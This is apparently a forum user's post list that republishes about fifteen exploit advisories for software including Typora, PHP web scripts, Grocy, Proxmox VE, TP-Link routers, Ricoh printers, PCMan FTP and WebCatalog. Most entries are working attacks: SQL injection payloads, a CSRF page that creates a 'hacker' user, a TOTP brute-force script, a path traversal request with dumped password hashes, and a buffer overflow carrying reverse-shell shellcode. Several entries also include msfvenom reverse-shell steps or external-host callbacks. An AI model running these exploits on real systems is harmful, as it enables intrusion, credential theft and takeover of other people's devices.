Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Typora v1.7.4 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Typora v1.7.4 - OS Command Injection # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 13.09.2023 # Vendor Homepage: http://www.typora.io # Software Link: https://download.typora.io/windows/typora-setup-ia32.exe # Tested Version: v1.7.4 (latest) # Tested on: Windows 2019 Server 64bit # # # Steps to Reproduce # # # # Open the application # Click on Preferences from the File menu # Select PDF from the Export tab # Check the “run command” at the bottom right and enter your reverse shell command into the opened box # Close the page and go back to the File menu # Then select PDF from the Export tab and click Save # Reverse shell is ready!
  2. HireHackking

    PHP Shopping Cart 4.2 - Multiple-SQLi

    HireHackking posted a blog entry in Hacker Technology
    ## Title: PHP Shopping Cart-4.2 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/13/2023 ## Vendor: https://www.phpjabbers.com/ ## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `id` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker easily can steal all information from the database of this web application! WARNING! All of you: Be careful what you buy! This will be your responsibility! [+]Payload: mysql Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT 3795=3795-- sRcp&session_id= Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT (ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND (SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id= ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2 ## Proof and Exploit: https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html System Administrator - Infrastructure Engineer Penetration Testing Engineer nu11secur1ty <http://nu11secur1ty.com/>
  3. HireHackking

    Fundraising Script 1.0 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Fundraising Script-1.0 SQLi ## Author: nu11secur1ty ## Date: 09/13/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `cid` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cid parameter, and a database error message was returned. The database is empty, but if it is not, this will be over for the money of the donors and their bank accounts! The attacker can steal all information from the database! [+]Payload: mysql Parameter: cid (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT (ELT(1741=1741,1))),0x7162787171),3873)) https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0 System Administrator - Infrastructure Engineer Penetration Testing Engineer nu11secur1ty <http://nu11secur1ty.com/>
  4. HireHackking

    Academy LMS 6.2 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Academy LMS 6.2 - SQL Injection # Exploit Author: CraCkEr # Date: 29/08/2023 # Vendor: Creativeitem # Vendor Homepage: https://creativeitem.com/ # Software Link: https://demo.creativeitem.com/academy/ # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-4974 # CWE: CWE-89 / CWE-74 / CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /academy/tutor/filter GET parameter 'price_min' is vulnerable to SQL Injection GET parameter 'price_max' is vulnerable to SQL Injection https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0 --- Parameter: price_min (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 Parameter: price_max (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0 --- [-] Done
  5. HireHackking

    Ricoh Printer - Directory and File Exposure

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Ricoh Printer Directory and File Exposure #Date: 9/15/2023 #Exploit Author: Thomas Heverin (Heverin Hacker) #Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers #Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py #Version: Ricoh Printers - All Versions #Tested on: Windows #CVE: N/A #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log) from ftplib import FTP def ftp_connect(ip): try: ftp = FTP(ip) ftp.login("guest", "guest") print(f"Connected to {ip} over FTP as 'guest'") return ftp except Exception as e: print(f"Failed to connect to {ip} over FTP: {e}") return None if __name__ == "__main__": target_ip = input("Enter the Ricoh Printer IP address: ") ftp_connection = ftp_connect(target_ip) if ftp_connection: try: while True: file_list = ftp_connection.nlst() print("List of Ricoh printer files and directories:") for index, item in enumerate(file_list, start=1): print(f"{index}. {item}") file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1 if file_index < 0: break if 0 <= file_index < len(file_list): selected_file = file_list[file_index] lines = [] ftp_connection.retrlines("RETR " + selected_file, lines.append) print(f"Contents of '{selected_file}':") for line in lines: print(line) else: print("Invalid file index.") except Exception as e: print(f"Failed to perform operation: {e}") finally: ftp_connection.quit()
  6. HireHackking

    101 News 1.0 - Multiple-SQLi

    HireHackking posted a blog entry in Hacker Technology
    ## Title: 101 News-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/16/2023 ## Vendor: https://mayurik.com/ ## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The searchtitle parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+' was submitted in the searchtitle parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. [+]Payload: ```mysql --- Parameter: searchtitle (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL# ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0 ## Proof and Exploit: https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html System Administrator - Infrastructure Engineer Penetration Testing Engineer nu11secur1ty <http://nu11secur1ty.com/>
  7. HireHackking

    Grocy <=4.0.2 - CSRF

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability # Application: Grocy # Version: <= 4.0.2 # Date: 09/21/2023 # Exploit Author: Chance Proctor # Vendor Homepage: https://grocy.info/ # Software Link: https://github.com/grocy/grocy # Tested on: Linux # CVE : CVE-2023-42270 Overview ================================================== When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting. This makes it easy to adjust your request since it is a known format. There is also no CSRF Token or other methods of verification in place to verify where the request is coming from. This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions. Proof of Concept ================================================== Host the following html code via a XSS or delivery via a phishing campaign: <html> <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded"> <input name='username' value='hacker' type='hidden'> <input name='password' value='test' type='hidden'> <input type=submit> </form> <script> history.pushState('','', '/'); document.forms[0].submit(); </script> </html> If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials Username: hacker Password: test Note: In order for this to work, the target must have Create User Permissions. This is enabled by default. Proof of Exploit/Reproduce ================================================== http://xploit.sh/posts/cve-2023-42270/
  8. HireHackking

    Proxmox VE - TOTP Brute Force

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Proxmox VE TOTP Brute Force # Date: 09/23/2023 # Exploit Author: Cory Cline, Gabe Rust # Vendor Homepage: https://www.proxmox.com/en/ # Software Link: http://download.proxmox.com/iso/ # Version: 5.4 - 7.4-1 # Tested on: Debian # CVE : CVE-2023-43320 import time import requests import urllib.parse import json import os import urllib3 urllib3.disable_warnings() threads=25 #################### REPLACE THESE VALUES ######################### password="KNOWN PASSWORD HERE" username="KNOWN USERNAME HERE" target_url="https://HOST:PORT" ################################################################## ticket="" ticket_username="" CSRFPreventionToken="" ticket_data={} auto_refresh_time = 20 # in minutes - 30 minutes before expiration last_refresh_time = 0 tokens = []; for num in range(0,1000000): tokens.append(str(num).zfill(6)) def refresh_ticket(target_url, username, password): global CSRFPreventionToken global ticket_username global ticket_data refresh_ticket_url = target_url + "/api2/extjs/access/ticket" refresh_ticket_cookies = {} refresh_ticket_headers = {} refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"} ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text) ticket_data = json.loads(ticket_data_raw) CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"] ticket_username = ticket_data["data"]["username"] def attack(token): global last_refresh_time global auto_refresh_time global target_url global username global password global ticket_username global ticket_data if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) url = target_url + "/api2/extjs/access/ticket" cookies = {} headers = {"Csrfpreventiontoken": CSRFPreventionToken} stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1] stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A') data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)} response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False) if(len(response.text) > 350): print(response.text) os._exit(1) while(1): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: res = [executor.submit(attack, token) for token in tokens] concurrent.futures.wait(res)
  9. HireHackking

    RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC

    HireHackking posted a blog entry in Hacker Technology
    RoyalTSX 6.0.1 RTSZ File Handling Heap Memory Corruption PoC Vendor: Royal Apps GmbH Web page: https://www.royalapps.com Affected version: 6.0.1.1000 (macOS) Summary: Royal TS is an ideal tool for system engineers and other IT professionals who need remote access to systems with different protocols. Not only easy to use, it enables secure multi-user document sharing. Desc: The application receives SIGABRT after RAPortCheck.createNWConnection() function is handling the SecureGatewayHost object in the RoyalTSXNativeUI. When the hostname has an array of around 1600 bytes and Test Connection is clicked the app crashes instantly. Tested on: MacOS 13.5.1 (Ventura) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5788 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5788.php 05.09.2023 -- ------------------------------------- Translated Report (Full Report Below) ------------------------------------- Process: RoyalTSX [23807] Path: /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX Identifier: com.lemonmojo.RoyalTSX.App Version: 6.0.1 (6.0.1.1000) Code Type: X86-64 (Native) Parent Process: launchd [1] User ID: 503 Date/Time: 2023-09-05 16:09:46.6361 +0200 OS Version: macOS 13.5.1 (22G90) Report Version: 12 Bridge OS Version: 7.6 (20P6072) Time Awake Since Boot: 21000 seconds Time Since Wake: 1106 seconds System Integrity Protection: enabled Crashed Thread: 0 tid_103 Dispatch queue: com.apple.main-thread Exception Type: EXC_BAD_ACCESS (SIGABRT) Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000050 Exception Codes: 0x0000000000000001, 0x0000000000000050 Termination Reason: Namespace SIGNAL, Code 6 Abort trap: 6 Terminating Process: RoyalTSX [23807] VM Region Info: 0x50 is not in any region. Bytes before following region: 140737488273328 REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL UNUSED SPACE AT START ---> shared memory 7ffffffec000-7ffffffed000 [ 4K] r-x/r-x SM=SHM Application Specific Information: abort() called Thread 0 Crashed:: tid_103 Dispatch queue: com.apple.main-thread 0 libsystem_kernel.dylib 0x7ff809ef7202 __pthread_kill + 10 1 libsystem_pthread.dylib 0x7ff809f2eee6 pthread_kill + 263 2 libsystem_c.dylib 0x7ff809e55b45 abort + 123 3 libmonosgen-2.0.1.dylib 0x1028daa1b altstack_handle_and_restore + 235 4 libmonosgen-2.0.1.dylib 0x102879db6 summarize_frame_internal + 310 5 libmonosgen-2.0.1.dylib 0x102879f66 summarize_frame + 198 6 libmonosgen-2.0.1.dylib 0x10287578f mono_walk_stack_full + 1135 7 libmonosgen-2.0.1.dylib 0x102873944 mono_summarize_managed_stack + 100 8 libmonosgen-2.0.1.dylib 0x102a0f478 mono_threads_summarize_execute_internal + 1256 9 libmonosgen-2.0.1.dylib 0x102a0f8aa mono_threads_summarize + 346 10 libmonosgen-2.0.1.dylib 0x1028e0b67 mono_dump_native_crash_info + 855 11 libmonosgen-2.0.1.dylib 0x10287864e mono_handle_native_crash + 318 12 libmonosgen-2.0.1.dylib 0x1027d1966 mono_crashing_signal_handler + 86 13 libsystem_platform.dylib 0x7ff809f5c5ed _sigtramp + 29 14 ??? 0x101e9502c ??? 15 RoyalTSXNativeUI 0x109e50012 RAPortCheck.createNWConnection() + 290 16 RoyalTSXNativeUI 0x109e4f6d2 RAPortCheck.connect() + 242 17 RoyalTSXNativeUI 0x10a021c70 static RASecureGatewayPropertyPageHelper.testConnection(hostname:port:logger:localizer:parentWindow:progressIndicator:testConnectionButton:) + 592 18 RoyalTSXNativeUI 0x10a0b94e7 RAPropertyPageSecureGatewayMain.testConnection() + 359 19 RoyalTSXNativeUI 0x10a0b9573 @objc RAPropertyPageSecureGatewayMain.buttonTestConnection_action(_:) + 51 20 AppKit 0x7ff80d29742c -[NSApplication(NSResponder) sendAction:to:from:] + 323 21 AppKit 0x7ff80d2972b0 -[NSControl sendAction:to:] + 86 22 AppKit 0x7ff80d2971e2 __26-[NSCell _sendActionFrom:]_block_invoke + 131 23 AppKit 0x7ff80d2970eb -[NSCell _sendActionFrom:] + 171 24 AppKit 0x7ff80d297031 -[NSButtonCell _sendActionFrom:] + 96 25 AppKit 0x7ff80d293ee5 NSControlTrackMouse + 1816 26 AppKit 0x7ff80d2937a9 -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 121 27 AppKit 0x7ff80d29367c -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 606 28 AppKit 0x7ff80d292ac0 -[NSControl mouseDown:] + 659 29 AppKit 0x7ff80d290f9d -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 4330 30 AppKit 0x7ff80d2087d7 -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 404 31 AppKit 0x7ff80d208427 -[NSWindow(NSEventRouting) sendEvent:] + 345 32 AppKit 0x7ff80d206e01 -[NSApplication(NSEvent) sendEvent:] + 345 33 AppKit 0x7ff80d3413ae -[NSApplication _doModalLoop:peek:] + 360 34 AppKit 0x7ff80d4c2219 __33-[NSApplication runModalSession:]_block_invoke_2 + 69 35 AppKit 0x7ff80d4c21c1 __33-[NSApplication runModalSession:]_block_invoke + 78 36 AppKit 0x7ff80d33f773 _NSTryRunModal + 100 37 AppKit 0x7ff80d4c20be -[NSApplication runModalSession:] + 128 38 RoyalTSXNativeUI 0x109f17044 RAPropertiesWindowController._showModal() + 628 39 RoyalTSXNativeUI 0x109f17548 @objc RAPropertiesWindowController._showModal() + 24 40 Foundation 0x7ff80ae84951 -[NSObject(NSThreadPerformAdditions) performSelector:onThread:withObject:waitUntilDone:modes:] + 379 41 Foundation 0x7ff80ae84676 -[NSObject(NSThreadPerformAdditions) performSelectorOnMainThread:withObject:waitUntilDone:] + 124 42 libffi.dylib 0x7ff81a5fd8c2 ffi_call_unix64 + 82 43 libffi.dylib 0x7ff81a5fd214 ffi_call_int + 830 Thread 0 crashed with X86 Thread State (64-bit): rax: 0x0000000000000000 rbx: 0x00007ff84d608700 rcx: 0x00007ff7be10fbc8 rdx: 0x0000000000000000 rdi: 0x0000000000000103 rsi: 0x0000000000000006 rbp: 0x00007ff7be10fbf0 rsp: 0x00007ff7be10fbc8 r8: 0x0000000000000212 r9: 0x00007fafaeaf64a8 r10: 0x0000000000000000 r11: 0x0000000000000246 r12: 0x0000000000000103 r13: 0x00007ff7be110418 r14: 0x0000000000000006 r15: 0x0000000000000016 rip: 0x00007ff809ef7202 rfl: 0x0000000000000246 cr2: 0x00007ff84d611068 Logical CPU: 0 Error Code: 0x02000148 Trap Number: 133 Thread 0 instruction stream: 0f 84 24 01 00 00 49 8b-79 08 4c 89 45 c0 89 4d ..$...I.y.L.E..M d4 48 89 55 c8 4d 89 cc-e8 5d 79 0e 00 48 89 c3 .H.U.M...]y..H.. 4b 8d 7c 3e 04 48 8b 73-30 ba 8c 00 00 00 e8 07 K.|>.H.s0....... 7f 25 00 4c 8b 45 c0 48-8b 43 58 4b 89 84 3e a0 .%.L.E.H.CXK..>. 00 00 00 41 8b 44 24 04-43 89 84 3e 90 00 00 00 ...A.D$.C..>.... 48 8b 43 38 4b 89 84 3e-a8 00 00 00 48 8b 43 60 H.C8K..>....H.C` [8b]40 50 43 89 84 3e b0-00 00 00 8b 43 40 43 89 .@PC..>.....C@C. <== 84 3e b4 00 00 00 48 8b-45 c8 43 89 84 3e 98 00 .>....H.E.C..>.. 00 00 8b 45 d4 43 89 84-3e 94 00 00 00 eb 18 48 ...E.C..>......H 8d 05 80 ff 26 00 e9 96-00 00 00 43 c7 84 3e 90 ....&......C..>. 00 00 00 ff ff ff ff 49-8b 45 10 48 8b 18 41 83 .......I.E.H..A. 38 00 74 24 4b 8d 7c 3e-04 4d 89 c4 e8 69 d8 14 8.t$K.|>.M...i.. Binary Images: 0x101deb000 - 0x101df6fff com.lemonmojo.RoyalTSX.App (6.0.1) <328845a4-2e68-3c0f-a495-033ac725bb43> /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX ... ...
  10. HireHackking

    GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities # Date: 25/9/2023 # Exploit Author: Syed Affan Ahmed (ZEROXINN) # Vendor Homepage: https://www.embedthis.com/goahead/ # Affected Version: 2.5 may be others. # Tested On Version: 2.5 in ZTE AC3630 ---------------------------POC--------------------------- GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation. HTML Injection can cause the ability to execute within the context of that site. http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>
  11. HireHackking

    TP-Link TL-WR740N - UnAuthenticated Directory Transversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal # Date: 25/9/2023 # Exploit Author: Syed Affan Ahmed (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ipaddr=192.168.0.100; mLangage=Âée; exception=4 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.0.1";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::
  12. HireHackking

    PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow # Date: 09/25/2023 # Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0 # Tested on: Windows XP SP3 #!/usr/bin/python import socket #buffer = 'A' * 2500 #offset = 2007 #badchars=\x00\x0a\x0d #return_address=0x7e429353 (USER32.dll) #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d" #nc -nvlp 4444 overflow = ( "\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9" "\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d" "\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f" "\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53" "\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55" "\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1" "\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52" "\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6" "\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37" "\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf" "\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3" "\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4" "\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75" "\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7" "\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e" "\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17" "\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd" "\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94" "\xd7") shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow # Change IP/Port as required s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer..." s.connect(('192.168.146.135',21)) data = s.recv(1024) s.send('USER anonymous' +'\r\n') data = s.recv(1024) s.send('PASS anonymous\r\n') s.send('pwd ' + shellcode + '\r\n') s.close() print "\nExploit completed successfully!." except: print "Could not connect to FTP!"
  13. HireHackking

    WebCatalog 48.4 - Arbitrary Protocol Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution # Date: 9/27/2023 # Exploit Author: ItsSixtyN3in # Vendor Homepage: https://webcatalog.io/en/ # Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe # Version: 48.4.0 # Tested on: Windows # CVE : CVE-2023-42222 Vulnerability summary: WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery. Exploit details: - Create a reverse shell file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe - Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py) python3 smbserver.py Tools -smb2support - Have the user sync a page with the payload as a renamed link [Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title) Payload: search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title Tobias Diehl Security Consultant OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300 Pronouns: he/him e-mail: tobias.diehl@bulletproofsi.com
  14. HireHackking

    TP-LINK TL-WR740N - Multiple HTML Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities # Date: 25/9/2023 # Exploit Author: Shujaat Amin (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: Windows 10 ---------------------------POC----------------------------- 1) Go to your routers IP (192.168.0.1) 2) Go to Access control --> Target,rule 3) Click on add new 5) Type <h1>Hello<h1> in Target Description box 6) Click on Save, and now you can see html injection on the webpage
  15. HireHackking

    Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure

    HireHackking posted a blog entry in Hacker Technology
